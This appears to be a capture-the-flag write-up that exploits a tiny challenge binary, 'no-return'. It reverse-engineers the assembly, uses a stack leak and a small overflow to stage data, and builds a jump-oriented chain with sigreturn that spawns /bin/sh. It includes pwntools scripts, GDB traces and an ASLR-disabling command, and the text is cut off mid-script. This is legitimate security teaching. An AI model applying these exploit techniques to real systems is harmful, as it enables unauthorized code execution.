No Return

We are given a 64-bit binary called no-return:

Arch:     amd64-64-little
RELRO:    No RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x400000)

Reverse engineering

The binary is statically compiled and is so small that we can print the full assembly here:

$ objdump -M intel -d no-return

no-return:     file format elf64-x86-64


Disassembly of section .text:

0000000000401000 <.text>:
  401000:       5c                      pop    rsp
  401001:       5f                      pop    rdi
  401002:       5e                      pop    rsi
  401003:       5d                      pop    rbp
  401004:       5a                      pop    rdx
  401005:       59                      pop    rcx
  401006:       5b                      pop    rbx
  401007:       48 31 c0                xor    rax,rax
  40100a:       ff 67 01                jmp    QWORD PTR [rdi+0x1]
  40100d:       48 ff c0                inc    rax
  401010:       de f1                   fdivrp st(1),st
  401012:       ff 22                   jmp    QWORD PTR [rdx]
  401014:       48 2b 74 24 10          sub    rsi,QWORD PTR [rsp+0x10]
  401019:       f5                      cmc
  40101a:       ff 22                   jmp    QWORD PTR [rdx]
  40101c:       48 89 e1                mov    rcx,rsp
  40101f:       fd                      std
  401020:       ff 22                   jmp    QWORD PTR [rdx]
  401022:       48 8d 0c d9             lea    rcx,[rcx+rbx*8]
  401026:       fd                      std
  401027:       ff 21                   jmp    QWORD PTR [rcx]
  401029:       48 31 d5                xor    rbp,rdx
  40102c:       0f 95 c4                setne  ah
  40102f:       ff a5 00 00 44 e8       jmp    QWORD PTR [rbp-0x17bc0000]
  401035:       48 01 f4                add    rsp,rsi
  401038:       de f9                   fdivp  st(1),st
  40103a:       ff 22                   jmp    QWORD PTR [rdx]
  40103c:       48 01 dd                add    rbp,rbx
  40103f:       9b                      fwait
  401040:       ff 65 c7                jmp    QWORD PTR [rbp-0x39]
  401043:       88 a7 00 00 44 e8       mov    BYTE PTR [rdi-0x17bc0000],ah
  401049:       f9                      stc
  40104a:       ff 22                   jmp    QWORD PTR [rdx]
  40104c:       59                      pop    rcx
  40104d:       48 89 d1                mov    rcx,rdx
  401050:       5a                      pop    rdx
  401051:       ff 21                   jmp    QWORD PTR [rcx]
  401053:       48 ff c1                inc    rcx
  401056:       de f1                   fdivrp st(1),st
  401058:       ff 22                   jmp    QWORD PTR [rdx]
  40105a:       48 92                   xchg   rdx,rax
  40105c:       de f9                   fdivp  st(1),st
  40105e:       ff 21                   jmp    QWORD PTR [rcx]
  401060:       48 ff c3                inc    rbx
  401063:       de f1                   fdivrp st(1),st
  401065:       ff 22                   jmp    QWORD PTR [rdx]
  401067:       48 87 cf                xchg   rdi,rcx
  40106a:       fd                      std
  40106b:       ff 22                   jmp    QWORD PTR [rdx]
  40106d:       54                      push   rsp
  40106e:       48 31 c0                xor    rax,rax
  401071:       48 ff c0                inc    rax
  401074:       48 31 ff                xor    rdi,rdi
  401077:       48 ff c7                inc    rdi
  40107a:       48 89 e6                mov    rsi,rsp
  40107d:       ba 08 00 00 00          mov    edx,0x8
  401082:       0f 05                   syscall
  401084:       48 81 ee b0 00 00 00    sub    rsi,0xb0
  40108b:       48 31 c0                xor    rax,rax
  40108e:       48 31 ff                xor    rdi,rdi
  401091:       48 8d 36                lea    rsi,[rsi]
  401094:       ba c0 00 00 00          mov    edx,0xc0
  401099:       0f 05                   syscall
  40109b:       48 83 c4 08             add    rsp,0x8
  40109f:       ff 64 24 f8             jmp    QWORD PTR [rsp-0x8]

This time, the binary is built purely for exploitation; it has no realistic functionality.

The real entry-point of the binary is at address 0x40106d. We can check it in GDB:

$ gdb -q no-return
Reading symbols from no-return...
(No debugging symbols found in no-return)
gef➤  start
[+] Breaking at entry-point: 0x40106d

So the main functionality of the program is handled by this assembly code:

  40106d:       54                      push   rsp
  40106e:       48 31 c0                xor    rax,rax
  401071:       48 ff c0                inc    rax
  401074:       48 31 ff                xor    rdi,rdi
  401077:       48 ff c7                inc    rdi
  40107a:       48 89 e6                mov    rsi,rsp
  40107d:       ba 08 00 00 00          mov    edx,0x8
  401082:       0f 05                   syscall
  401084:       48 81 ee b0 00 00 00    sub    rsi,0xb0
  40108b:       48 31 c0                xor    rax,rax
  40108e:       48 31 ff                xor    rdi,rdi
  401091:       48 8d 36                lea    rsi,[rsi]
  401094:       ba c0 00 00 00          mov    edx,0xc0
  401099:       0f 05                   syscall
  40109b:       48 83 c4 08             add    rsp,0x8
  40109f:       ff 64 24 f8             jmp    QWORD PTR [rsp-0x8]

Analyzing assembly code

The program writes data to stdout using sys_write and then reads input data using sys_read. Finally, it performs an unusual indirect jump. The program just crashes when executed normally:

$ ./no-return
Jasdf
zsh: segmentation fault (core dumped)  ./no-return

$ echo asdf | ./no-return
~Bzsh: done                              echo asdf |
zsh: segmentation fault (core dumped)  ./no-return

Notice that sys_write needs these values:

$rax must be 1
$rdi stores the file descriptor (1 for stdout)
$rsi has the address of the string that will be written
$rdx contains the size to be written in bytes

  40106d:       54                      push   rsp
  40106e:       48 31 c0                xor    rax,rax
  401071:       48 ff c0                inc    rax
  401074:       48 31 ff                xor    rdi,rdi
  401077:       48 ff c7                inc    rdi
  40107a:       48 89 e6                mov    rsi,rsp
  40107d:       ba 08 00 00 00          mov    edx,0x8
  401082:       0f 05                   syscall

This block is just a memory leak (specifically, a stack address leak): push rsp stores the stack pointer on the stack, and sys_write then prints those 8 bytes. We saw it earlier, but this makes it clearer:

$ echo asdf | ./no-return | xxd
00000000: 80c8 43e9 fc7f 0000                      ..C.....
zsh: done                              echo asdf |
zsh: segmentation fault (core dumped)  ./no-return |
zsh: done                              xxd
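
As a quick sanity check, the eight bytes shown by xxd can be decoded by hand as a little-endian 64-bit integer. This is a minimal sketch using only the standard library; the hex string is copied from the dump above, and the variable names are just illustrative.

```python
import struct

# Bytes copied from the xxd output above (80c8 43e9 fc7f 0000).
raw = bytes.fromhex('80c843e9fc7f0000')

# '<Q' means: little-endian, unsigned 64-bit integer.
(leak,) = struct.unpack('<Q', raw)
print(hex(leak))
```

The result has the usual 0x7ff... shape of a Linux stack address, which is what pwntools' u64 returns later in the exploit script.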

For sys_read, this setup is needed:

$rax must be set to 0
$rdi must store the file descriptor (0 for stdin)
$rsi must contain the address to write the data into
$rdx must have the length to read

  401084:       48 81 ee b0 00 00 00    sub    rsi,0xb0
  40108b:       48 31 c0                xor    rax,rax
  40108e:       48 31 ff                xor    rdi,rdi
  401091:       48 8d 36                lea    rsi,[rsi]
  401094:       ba c0 00 00 00          mov    edx,0xc0
  401099:       0f 05                   syscall

The program reads up to 0xc0 (192) bytes and stores them on the stack (specifically at $rsp - 0xb0, because $rsi equals $rsp in the previous assembly block).

Finally, after adding 0x8 to $rsp, the program jumps to the address stored at $rsp - 0x8 (notice the difference between jmp rsp-0x8 and jmp QWORD PTR [rsp-0x8]):

  40109b:       48 83 c4 08             add    rsp,0x8
  40109f:       ff 64 24 f8             jmp    QWORD PTR [rsp-0x8]

Buffer Overflow vulnerability

Hence, we can control this value: the program reads up to 0xc0 bytes, but the reserved stack buffer is only 0xb0 bytes, so the 8 bytes right after the buffer hold the address to jump to (recall that NX is enabled, so we cannot place shellcode on the stack and jump to it).
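
The arithmetic behind this can be written down explicitly. The following is only a sketch based on the two constants visible in the disassembly (sub rsi, 0xb0 and mov edx, 0xc0); the constant names are made up for illustration.

```python
READ_SIZE = 0xc0        # edx passed to sys_read
BUFFER_DISTANCE = 0xb0  # the buffer starts 0xb0 bytes below the saved slot

# The slot dereferenced by jmp QWORD PTR [rsp-0x8] sits right after the buffer.
jump_slot_offset = BUFFER_DISTANCE

# Everything read beyond the buffer is attacker-controlled too.
controlled_after_buffer = READ_SIZE - BUFFER_DISTANCE

print(f'jump slot at payload offset {jump_slot_offset}')
print(f'bytes available from that offset on: {controlled_after_buffer}')
```

So a payload has 176 bytes of filler, then 8 bytes for the jump target, then 8 more bytes that land just above it on the stack.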

All we have so far is a stack address leak and a jmp instruction we can control. Recall that there were more assembly instructions outside the entry-point.

Exploit strategy

The strategy is to use sys_execve in order to get a shell. For that purpose, we need:

$rax must be set to 0x3b
$rdi must contain the address where the command string is stored ("/bin/sh")
$rsi set to 0
$rdx set to 0

In order to control $rax and $rdi we can find some gadgets:

$ ROPgadget --binary no-return | grep ' rax'
0x000000000040100d : inc rax ; fdivrp st(1) ; jmp qword ptr [rdx]
0x0000000000401003 : pop rbp ; pop rdx ; pop rcx ; pop rbx ; xor rax, rax ; jmp qword ptr [rdi + 1]
0x0000000000401006 : pop rbx ; xor rax, rax ; jmp qword ptr [rdi + 1]
0x0000000000401005 : pop rcx ; pop rbx ; xor rax, rax ; jmp qword ptr [rdi + 1]
0x0000000000401001 : pop rdi ; pop rsi ; pop rbp ; pop rdx ; pop rcx ; pop rbx ; xor rax, rax ; jmp qword ptr [rdi + 1]
0x0000000000401004 : pop rdx ; pop rcx ; pop rbx ; xor rax, rax ; jmp qword ptr [rdi + 1]
0x0000000000401002 : pop rsi ; pop rbp ; pop rdx ; pop rcx ; pop rbx ; xor rax, rax ; jmp qword ptr [rdi + 1]
0x000000000040105a : xchg rax, rdx ; fdivp st(1) ; jmp qword ptr [rcx]
0x0000000000401007 : xor rax, rax ; jmp qword ptr [rdi + 1]

$ ROPgadget --binary no-return | grep -v xor | grep ' rax'
0x000000000040100d : inc rax ; fdivrp st(1) ; jmp qword ptr [rdx]
0x000000000040105a : xchg rax, rdx ; fdivp st(1) ; jmp qword ptr [rcx]

$ ROPgadget --binary no-return | grep ' rdi'
0x0000000000401001 : pop rdi ; pop rsi ; pop rbp ; pop rdx ; pop rcx ; pop rbx ; xor rax, rax ; jmp qword ptr [rdi + 1]
0x0000000000401067 : xchg rdi, rcx ; std ; jmp qword ptr [rdx]

Notice that I filtered out every gadget containing xor rax, rax, because that instruction would break our strategy by setting $rax to 0. For the moment, I will take a look at these gadgets:

$ ROPgadget --binary no-return | grep xchg | grep -E 'rax|rdi'
0x000000000040105a : xchg rax, rdx ; fdivp st(1) ; jmp qword ptr [rcx]
0x0000000000401067 : xchg rdi, rcx ; std ; jmp qword ptr [rdx]

With these gadgets, we are able to control the contents of $rax and $rdi if we control $rdx and $rcx.

In order to control $rdx and $rcx, we have this set of instructions from the top of the binary:

  401000:       5c                      pop    rsp
  401001:       5f                      pop    rdi
  401002:       5e                      pop    rsi
  401003:       5d                      pop    rbp
  401004:       5a                      pop    rdx
  401005:       59                      pop    rcx
  401006:       5b                      pop    rbx
  401007:       48 31 c0                xor    rax,rax
  40100a:       ff 67 01                jmp    QWORD PTR [rdi+0x1]

Notice that the last instruction jumps to the address stored at $rdi + 1, so $rdi + 1 must point to memory that holds a valid executable address (we can’t put the address of "/bin/sh" in $rdi yet). Moreover, there is no pop rax among these instructions, and xor rax, rax sets $rax to 0, so we can’t set $rax to 0x3b here either.

Hence, the idea is to control $rcx and $rdx and then call one of the previous gadgets. But there is a problem if we want to execute both: they are roughly symmetric, so once the values are right for the first gadget, they will cause a crash in the second one. And we can’t go through the previous set of instructions again, because we would lose $rax and $rdi.

Tweaking the strategy

Therefore, we will use just one of the gadgets. To set the value of $rdi, I will use sys_rt_sigreturn, which restores a frame from the stack into the registers, so they are fully controlled.

For sys_rt_sigreturn, we only need $rax to equal 0xf. Hence, we can set this value with:

0x000000000040105a : xchg rax, rdx ; fdivp st(1) ; jmp qword ptr [rcx]

So, $rdx must have a 0xf and then the address pointed to by $rcx must contain the address of a syscall instruction (0x401082 or 0x401099). Once we reach the sys_rt_sigreturn step, we will set the registers to execute sys_execve.

Exploit development

Now that we have the strategy clear, we must implement it. First of all, we need to put data on the stack.

Notice that we can use the last jmp instruction of the program to jump back to the entry-point. At first glance, this is not useful, but we can use a trick. Recall that the program reads up to 0xc0 bytes, but only 0xb0 were reserved. This is a kind of buffer overflow vulnerability, but there is no return address to control.

Actually, there are no gadgets that end in ret, all of them end with a jmp instruction. In fact, the technique we are using is called JOP (Jump Oriented Programming).

Creating space for the payload

The key here is that we have 16 bytes to write past the buffer. The first 8 bytes must contain the address that the last jmp instruction will execute next. I will use the second 8 bytes to leave the stack a bit cleaner. Hence, the first 8 bytes will store address 0x40109b (add rsp, 0x8), so that we reach the jmp instruction again, but with the stack clean for the next round. The second 8 bytes will contain the address of the entry-point; you’ll figure out why in a second.

For the moment, we can write a loop in a Python script that has this functionality:

#!/usr/bin/env python3

from pwn import *

context.binary = 'no-return'


def get_process():
    if len(sys.argv) == 1:
        return context.binary.process()

    host, port = sys.argv[1].split(':')
    return remote(host, int(port))


def main():
    p = get_process()

    offset = 176
    junk = b'A' * offset

    for _ in range(8):
        leak = u64(p.recv(8).ljust(8, b'\0'))
        log.info(f'Stack address leak: {hex(leak)}')

        payload  = junk
        payload += p64(0x40109b)
        payload += p64(0x40106d)

        p.send(payload)

$ python3 solve.py
[*] './no-return'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Starting local process './no-return': pid 1015028
[*] Stack address leak: 0x7ffcd2a8edb0
[*] Stack address leak: 0x7ffcd2a8edb8
[*] Stack address leak: 0x7ffcd2a8edc0
[*] Stack address leak: 0x7ffcd2a8edc8
[*] Stack address leak: 0x7ffcd2a8edd0
[*] Stack address leak: 0x7ffcd2a8edd8
[*] Stack address leak: 0x7ffcd2a8ede0
[*] Stack address leak: 0x7ffcd2a8ede8
[*] Stopped process './no-return' (pid 1015028)

Notice that the stack address leak increases by 8 on each iteration. With this procedure, we gain control over 8 bytes on the stack per iteration, and they remain there until the program terminates. We can tweak the script a bit to prove it in GDB.
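
To see why exactly 8 bytes survive per round, here is a small model of the loop in plain Python. It is only a sketch: it tracks $rsp and the bytes written by sys_read, nothing else, and the function and variable names are illustrative. The starting value is the first leak from the run above.

```python
ENTRY = 0x40106d        # push rsp ; sys_write ; sys_read ; ...
ADD_RSP_JMP = 0x40109b  # add rsp, 0x8 ; jmp QWORD PTR [rsp-0x8]


def simulate(first_rsp: int, rounds: int):
    """Model only rsp and the bytes that sys_read stores on the stack."""
    memory = {}   # address -> byte value
    leaks = []
    rsp = first_rsp

    for i in range(rounds):
        # push rsp: the old rsp is stored, then printed by sys_write
        leaks.append(rsp)
        rsp -= 8

        # sys_read(0, rsp - 0xb0, 0xc0) with a per-round marker as junk
        buf = rsp - 0xb0
        marker = bytes([ord('A') + i]) * 0xb0
        payload = marker + ADD_RSP_JMP.to_bytes(8, 'little') + ENTRY.to_bytes(8, 'little')
        for off, value in enumerate(payload):
            memory[buf + off] = value

        rsp += 8  # add rsp, 0x8 ; jmp [rsp-0x8] -> 0x40109b
        rsp += 8  # add rsp, 0x8 ; jmp [rsp-0x8] -> 0x40106d

    return leaks, memory


leaks, memory = simulate(0x7ffcd2a8edb0, 8)
first_buf = leaks[0] - 0xb8
survivors = bytes(memory[first_buf + k] for k in range(8 * 8))
print([hex(x) for x in leaks])
print(survivors[:24])
```

Each round starts its buffer 8 bytes higher than the previous one, so it overwrites everything except the first 8 bytes of the round before.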

def main():
    p = get_process()

    offset = 176

    gdb.attach(p, gdbscript='break *0x40109f')

    for i in range(8):
        junk = chr(ord('A') + i).encode() * offset

        leak = u64(p.recv(8).ljust(8, b'\0'))
        log.info(f'Stack address leak: {hex(leak)}')

        payload  = junk
        payload += p64(0x40109b)
        payload += p64(0x40106d)

        p.send(payload)

The script uses different characters as junk on each iteration. We can run it and continue in GDB a few times. Then we can show the stack:

gef➤  grep AAAA
[+] Searching 'AAAA' in memory
[+] In '[stack]'(0x7ffc34121000-0x7ffc34142000), permission=rw-
  0x7ffc34140fa8 - 0x7ffc34140fdf  →   "AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFFGG[...]"
  0x7ffc34140fac - 0x7ffc34140fe3  →   "AAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFFGGGGGG[...]"
gef➤  x/100x 0x7ffc34140fa8
0x7ffc34140fa8: 0x41414141      0x41414141      0x42424242      0x42424242
0x7ffc34140fb8: 0x43434343      0x43434343      0x44444444      0x44444444
0x7ffc34140fc8: 0x45454545      0x45454545      0x46464646      0x46464646
0x7ffc34140fd8: 0x47474747      0x47474747      0x47474747      0x47474747
0x7ffc34140fe8: 0x47474747      0x47474747      0x47474747      0x47474747
0x7ffc34140ff8: 0x47474747      0x47474747      0x47474747      0x47474747
0x7ffc34141008: 0x47474747      0x47474747      0x47474747      0x47474747
0x7ffc34141018: 0x47474747      0x47474747      0x47474747      0x47474747
0x7ffc34141028: 0x47474747      0x47474747      0x47474747      0x47474747
0x7ffc34141038: 0x47474747      0x47474747      0x47474747      0x47474747
0x7ffc34141048: 0x47474747      0x47474747      0x47474747      0x47474747
0x7ffc34141058: 0x47474747      0x47474747      0x47474747      0x47474747
0x7ffc34141068: 0x47474747      0x47474747      0x47474747      0x47474747
0x7ffc34141078: 0x47474747      0x47474747      0x47474747      0x47474747
0x7ffc34141088: 0x0040109b      0x00000000      0x0040106d      0x00000000
0x7ffc34141098: 0x34141b1b      0x00007ffc      0x34141b26      0x00007ffc
0x7ffc341410a8: 0x34141b37      0x00007ffc      0x34141b61      0x00007ffc
0x7ffc341410b8: 0x34141b72      0x00007ffc      0x34141b89      0x00007ffc
0x7ffc341410c8: 0x34141ba7      0x00007ffc      0x34141bc2      0x00007ffc
0x7ffc341410d8: 0x34141bda      0x00007ffc      0x34141bee      0x00007ffc
0x7ffc341410e8: 0x34141c05      0x00007ffc      0x34141c1a      0x00007ffc
0x7ffc341410f8: 0x34141c33      0x00007ffc      0x34141c47      0x00007ffc
0x7ffc34141108: 0x34141c55      0x00007ffc      0x34141c81      0x00007ffc
0x7ffc34141118: 0x34141caa      0x00007ffc      0x34141cb9      0x00007ffc
0x7ffc34141128: 0x34141d00      0x00007ffc      0x34141dc4      0x00007ffc

Alright, we found a way to increase the stack space and control what we are storing there.

Crafting the payload

To continue with exploitation, I will disable ASLR locally and use hard-coded addresses to implement the strategy explained above.

# echo 0 | tee /proc/sys/kernel/randomize_va_space
0

If we execute the same Python script, we will see fixed addresses because ASLR is disabled:

gef➤  grep AAAA
[+] Searching 'AAAA' in memory
[+] In '[stack]'(0x7ffffffde000-0x7ffffffff000), permission=rw-
  0x7fffffffe6e8 - 0x7fffffffe71f  →   "AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFFGG[...]"
  0x7fffffffe6ec - 0x7fffffffe723  →   "AAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFFGGGGGG[...]"
gef➤  x/100x 0x7fffffffe6e8
0x7fffffffe6e8: 0x41414141      0x41414141      0x42424242      0x42424242
0x7fffffffe6f8: 0x43434343      0x43434343      0x44444444      0x44444444
0x7fffffffe708: 0x45454545      0x45454545      0x46464646      0x46464646
0x7fffffffe718: 0x47474747      0x47474747      0x47474747      0x47474747
0x7fffffffe728: 0x47474747      0x47474747      0x47474747      0x47474747
0x7fffffffe738: 0x47474747      0x47474747      0x47474747      0x47474747
0x7fffffffe748: 0x47474747      0x47474747      0x47474747      0x47474747
0x7fffffffe758: 0x47474747      0x47474747      0x47474747      0x47474747
0x7fffffffe768: 0x47474747      0x47474747      0x47474747      0x47474747
0x7fffffffe778: 0x47474747      0x47474747      0x47474747      0x47474747
0x7fffffffe788: 0x47474747      0x47474747      0x47474747      0x47474747
0x7fffffffe798: 0x47474747      0x47474747      0x47474747      0x47474747
0x7fffffffe7a8: 0x47474747      0x47474747      0x47474747      0x47474747
0x7fffffffe7b8: 0x47474747      0x47474747      0x47474747      0x47474747
0x7fffffffe7c8: 0x0040109b      0x00000000      0x0040106d      0x00000000
0x7fffffffe7d8: 0xffffeb1b      0x00007fff      0xffffeb26      0x00007fff
0x7fffffffe7e8: 0xffffeb37      0x00007fff      0xffffeb61      0x00007fff
0x7fffffffe7f8: 0xffffeb72      0x00007fff      0xffffeb89      0x00007fff
0x7fffffffe808: 0xffffeba7      0x00007fff      0xffffebc2      0x00007fff
0x7fffffffe818: 0xffffebda      0x00007fff      0xffffebee      0x00007fff
0x7fffffffe828: 0xffffec05      0x00007fff      0xffffec1a      0x00007fff
0x7fffffffe838: 0xffffec33      0x00007fff      0xffffec47      0x00007fff
0x7fffffffe848: 0xffffec55      0x00007fff      0xffffec81      0x00007fff
0x7fffffffe858: 0xffffecaa      0x00007fff      0xffffecb9      0x00007fff
0x7fffffffe868: 0xffffed00      0x00007fff      0xffffedc4      0x00007fff

And these were the leaks:

$ python3 solve.py
[*] './no-return'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Starting local process './no-return': pid 1031120
[+] Waiting for debugger: Done
[*] Stack address leak: 0x7fffffffe7a0
[*] Stack address leak: 0x7fffffffe7a8
[*] Stack address leak: 0x7fffffffe7b0
[*] Stack address leak: 0x7fffffffe7b8
[*] Stack address leak: 0x7fffffffe7c0
[*] Stack address leak: 0x7fffffffe7c8
[*] Stack address leak: 0x7fffffffe7d0
[*] Stack address leak: 0x7fffffffe7d8
[*] Stopped process './no-return' (pid 1031120)

Alright, now let’s build the payload to be executed. First of all, once we end the loop, we will jump to 0x401000, to set the value of some registers:

  401000:       5c                      pop    rsp
  401001:       5f                      pop    rdi
  401002:       5e                      pop    rsi
  401003:       5d                      pop    rbp
  401004:       5a                      pop    rdx
  401005:       59                      pop    rcx
  401006:       5b                      pop    rbx
  401007:       48 31 c0                xor    rax,rax
  40100a:       ff 67 01                jmp    QWORD PTR [rdi+0x1]

$rsp must be set to the address where the value for $rdi is stored
$rdi must contain an address (minus one) that contains the address of the next instruction to execute (the gadget at 0x40105a)
Dummy values for $rsi and $rbp
$rdx must have 0xf (because the gadget will move this value to $rax, so that we can execute sys_rt_sigreturn)
$rcx will have the address of an address that points to a syscall instruction (0x401082 or 0x401099)
Dummy value for $rbx

Then, the program will jump to the address stored in the address pointed to by $rdi+0x1, which is the gadget:

0x000000000040105a : xchg rax, rdx ; fdivp st(1) ; jmp qword ptr [rcx]

Here, the value of $rax will change to 0xf, and the jump will bring the program to execute sys_rt_sigreturn. Thus, after the previous data, we will put the frame that will be restored to the registers. In pwntools there is a class called SigreturnFrame that helps with this technique.

Once the registers are set as explained before, the program will spawn a shell.

For the moment, I will use recognizable values to identify the addresses that must replace those dummy values:

def send_data(p, data: bytes, offset: int) -> int:
    junk = data * (offset // 8)
    leak = u64(p.recv(8).ljust(8, b'\0'))

    payload  = junk
    payload += p64(0x40109b)
    payload += p64(0x40106d)

    p.send(payload)

    return leak


def main():
    p = get_process()

    offset = 176

    data  = b'/bin/sh\0'
    data += p64(0x40105a)
    data += p64(0x401099)

    data += p64(0xacdcacdc)     # rdi
    data += p64(0)              # rsi
    data += p64(0)              # rbp
    data += p64(0xf)            # rdx
    data += p64(0xcafebabe)     # rcx
    data += p64(0)              # rbx

    frame = SigreturnFrame()
    frame.rax = 0x3b
    frame.rip = 0x401099
    frame.rdi = 0xf00df00d
    frame.rsi = 0
    frame.rdx = 0

    data += bytes(frame)

    gdb.attach(p, gdbscript='break *0x401000')

    for i in range(0, len(data), 8):
        send_data(p, data[i : i + 8], offset)

    payload  = b'A' * offset
    payload += p64(0x401000)
    payload += p64(0xdeadbeef)  # rsp

    p.send(payload)
    p.recv()

    p.interactive()

Tweaking the payload

I’ll attach GDB to the process and set a breakpoint at 0x401000 (at pop rsp). We can run it until we reach this point:

gef➤  continue
Continuing.

Breakpoint 1, 0x0000000000401000 in ?? ()

We see the dummy value 0xdeadbeef that will go to $rsp:

gef➤  x/i $rip
=> 0x401000:    pop    rsp
gef➤  x/4gx $rsp
0x7fffffffe8e0: 0x00000000deadbeef      0x00007fffffffef46
0x7fffffffe8f0: 0x00007fffffffef5b      0x00007fffffffefaa

We need to change 0xdeadbeef to the address that stores the value that needs to go in $rdi, which is the dummy 0xacdcacdc:

gef➤  grep 0xacdcacdc
[+] Searching '\xdc\xac\xdc\xac' in memory
[+] In '[stack]'(0x7ffffffde000-0x7ffffffff000), permission=rw-
  0x7fffffffe700 - 0x7fffffffe710  →   "\xdc\xac\xdc\xac[...]"

So 0xdeadbeef -> 0x7fffffffe700. We can continue:

gef➤  si
0x0000000000401001 in ?? ()

And set the new value of $rsp:

gef➤  set $rsp = 0x7fffffffe700
gef➤  x/i $rip
=> 0x401001:    pop    rdi
gef➤  x/4gx $rsp
0x7fffffffe700: 0x00000000acdcacdc      0x0000000000000000
0x7fffffffe710: 0x0000000000000000      0x000000000000000f
gef➤  si
0x0000000000401002 in ?? ()

Now let’s find the address where 0x40105a is stored:

gef➤  p/x $rdi
$1 = 0xacdcacdc
gef➤  grep 0x40105a
[+] Searching '\x5a\x10\x40' in memory
[+] In '[stack]'(0x7ffffffde000-0x7ffffffff000), permission=rw-
  0x7fffffffe6f0 - 0x7fffffffe6fc  →   "\x5a\x10\x40[...]"

So 0xacdcacdc -> (0x7fffffffe6f0 - 1), so that jmp QWORD PTR [rdi+0x1] goes to 0x40105a.

gef➤  set $rdi = 0x7fffffffe6f0 - 1

A few steps later, we must change the value of $rcx, which is set to 0xcafebabe, and should be the address where 0x401099 is stored:

gef➤  p/x $rcx
$2 = 0xcafebabe
gef➤  grep 0x401099
[+] Searching '\x99\x10\x40' in memory
[+] In '[stack]'(0x7ffffffde000-0x7ffffffff000), permission=rw-
  0x7fffffffe6f8 - 0x7fffffffe704  →   "\x99\x10\x40[...]"
  0x7fffffffe7d8 - 0x7fffffffe7e4  →   "\x99\x10\x40[...]"

So 0xcafebabe -> 0x7fffffffe6f8:

gef➤  set $rcx = 0x7fffffffe6f8

Eventually, we will jump to the gadget and then execute sys_rt_sigreturn:

gef➤  x/i $rip
=> 0x401099:    syscall
gef➤  p/x $rax
$3 = 0xf
gef➤  x/40gx $rsp
0x7fffffffe730: 0x0000000000000000      0x0000000000000000
0x7fffffffe740: 0x0000000000000000      0x0000000000000000
0x7fffffffe750: 0x0000000000000000      0x0000000000000000
0x7fffffffe760: 0x0000000000000000      0x0000000000000000
0x7fffffffe770: 0x0000000000000000      0x0000000000000000
0x7fffffffe780: 0x0000000000000000      0x0000000000000000
0x7fffffffe790: 0x0000000000000000      0x00000000f00df00d
0x7fffffffe7a0: 0x0000000000000000      0x0000000000000000
0x7fffffffe7b0: 0x0000000000000000      0x0000000000000000
0x7fffffffe7c0: 0x000000000000003b      0x0000000000000000
0x7fffffffe7d0: 0x0000000000000000      0x0000000000401099
0x7fffffffe7e0: 0x0000000000000000      0x0000000000000033
0x7fffffffe7f0: 0x0000000000000000      0x0000000000000000
0x7fffffffe800: 0x0000000000000000      0x0000000000000000
0x7fffffffe810: 0x0000000000000000      0x0000000000000000
0x7fffffffe820: 0x0000000000000000      0x4141414141414141
0x7fffffffe830: 0x4141414141414141      0x4141414141414141
0x7fffffffe840: 0x4141414141414141      0x4141414141414141
0x7fffffffe850: 0x4141414141414141      0x4141414141414141
0x7fffffffe860: 0x4141414141414141      0x4141414141414141

Stepping again, the frame will be restored to the registers:

gef➤  si
0x0000000000401099 in ?? ()

gef➤  info registers
rax            0x3b                0x3b
rbx            0x0                 0x0
rcx            0x0                 0x0
rdx            0x0                 0x0
rsi            0x0                 0x0
rdi            0xf00df00d          0xf00df00d
rbp            0x0                 0x0
rsp            0x0                 0x0
...
rip            0x401099            0x401099
...

And there is the last dummy value (0xf00df00d), which must be the address where "/bin/sh" is stored:

gef➤  grep /bin/sh
[+] Searching '/bin/sh' in memory
[+] In '[stack]'(0x7ffffffde000-0x7ffffffff000), permission=rw-
  0x7fffffffe6e8 - 0x7fffffffe6ef  →   "/bin/sh"

So 0xf00df00d -> 0x7fffffffe6e8. If we change this value and continue, we will have a shell:

gef➤  set $rdi = 0x7fffffffe6e8
gef➤  continue
Continuing.
process 1145760 is executing new program: /usr/bin/dash
Warning:
Cannot insert breakpoint 1.
Cannot access memory at address 0x401000
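
The values found in the debugger can be cross-checked with a tiny model of the two gadgets. This is a sketch, not an emulator: it only mimics the pops at 0x401000, the jmp [rdi+0x1], and the xchg gadget at 0x40105a, using the first leak seen with ASLR disabled (0x7fffffffe7a0). The function name and the dictionary-based memory are illustrative.

```python
def emulate_chain(stack_leak: int):
    base = stack_leak - 0xb8  # address of the first persistent qword
    qwords = [
        int.from_bytes(b'/bin/sh\0', 'little'),
        0x40105a,       # xchg rax, rdx ; fdivp ; jmp [rcx]
        0x401099,       # syscall
        base + 8 - 1,   # rdi: slot holding 0x40105a, minus one
        0,              # rsi
        0,              # rbp
        0xf,            # rdx
        base + 16,      # rcx: slot holding 0x401099
        0,              # rbx
    ]
    memory = {base + 8 * i: value for i, value in enumerate(qwords)}

    # 0x401000: pop rsp, then six pops from the new stack location
    regs = {'rsp': base + 24}
    for name in ('rdi', 'rsi', 'rbp', 'rdx', 'rcx', 'rbx'):
        regs[name] = memory[regs['rsp']]
        regs['rsp'] += 8
    regs['rax'] = 0                       # xor rax, rax
    first_jump = memory[regs['rdi'] + 1]  # jmp QWORD PTR [rdi+0x1]

    # 0x40105a: xchg rax, rdx ; jmp QWORD PTR [rcx]
    regs['rax'], regs['rdx'] = regs['rdx'], regs['rax']
    second_jump = memory[regs['rcx']]

    return regs, first_jump, second_jump


regs, first_jump, second_jump = emulate_chain(0x7fffffffe7a0)
print(hex(first_jump), hex(second_jump), hex(regs['rax']), hex(regs['rsp']))
```

The model ends with $rax = 0xf, the next jump at 0x401099 and $rsp = 0x7fffffffe730, the same state GDB showed right before the syscall.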

Alright, we can modify the dummy values and see if the exploit works:

def main():
    p = get_process()

    offset = 176

    data  = b'/bin/sh\0'
    data += p64(0x40105a)
    data += p64(0x401099)

    data += p64(0x7fffffffe6f0 - 1)  # rdi
    data += p64(0)                   # rsi
    data += p64(0)                   # rbp
    data += p64(0xf)                 # rdx
    data += p64(0x7fffffffe6f8)      # rcx
    data += p64(0)                   # rbx

    frame = SigreturnFrame()
